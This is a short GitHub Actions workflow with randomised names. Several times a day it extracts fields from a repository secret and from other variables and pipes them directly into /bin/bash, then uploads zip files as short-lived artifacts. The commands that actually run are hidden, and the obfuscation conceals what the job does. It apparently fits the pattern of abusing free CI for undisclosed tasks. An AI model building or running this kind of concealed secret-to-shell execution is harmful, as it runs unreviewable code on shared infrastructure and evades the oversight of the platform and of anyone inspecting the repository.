name: huazoujujin
on:
  workflow_dispatch:

  schedule:
    - cron: '14 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: huazoujujin
        env:
          v66683: ${{ secrets.v66683 }}
        run: |
          printf '%s' "$v66683" | jq -r .pcbdt570 | /bin/bash
          echo $xkamq91787 | jq -r .dhkmk2 | /bin/bash
          printf '%s' "$smt9487" | jq -r .b70657 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: F0vXeQZC
          path: "*.zip"
          retention-days: 1
